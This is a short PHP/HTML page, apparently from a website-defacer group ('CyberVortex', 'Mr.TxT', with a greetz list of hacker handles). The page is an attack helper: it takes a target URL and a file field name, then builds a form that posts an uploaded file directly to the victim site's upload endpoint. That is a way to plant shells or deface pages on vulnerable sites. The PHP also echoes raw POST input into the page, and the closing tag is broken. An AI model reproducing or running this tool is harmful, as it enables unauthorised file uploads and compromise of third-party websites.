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- <title>CyberVortex</title>
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- <center><img src="" width="150" height="150""><center>
- <font color='red' size='12'>Mr.TxT </font>
- <pre><font color="red" size="4">Greetz: <br><font color="green"> Mr.TxT |./AkatsuChan| SC0RP10N_CYB3R | MR.O_LOCK | MR.T3RSAKITI | Mr.Sw2T | Mr.VENoM | N4cle | MR.F_CRAFT | D1n25 | Mr.Swan | Mr.Kribbou_404 <br> Nov01 | ;/k0v3T | Mr.teseh | TCcrew | Mr.JrH | Mr_H04X | iD_SecUre | Tendo404 | S4NT4CL4US | DIV9 | Mr.rc8 | H34V34N | Mh4nxk0k
- [============================================================================]
- </pre>
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- <input type="submit" name="d" value="Kunci Target!!!">
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- <?php
- $url = $_POST['url'];
- $pf = $_POST['pf'];
- $d = $_POST['d'];
- if($d) {
- echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
- }
- ?>
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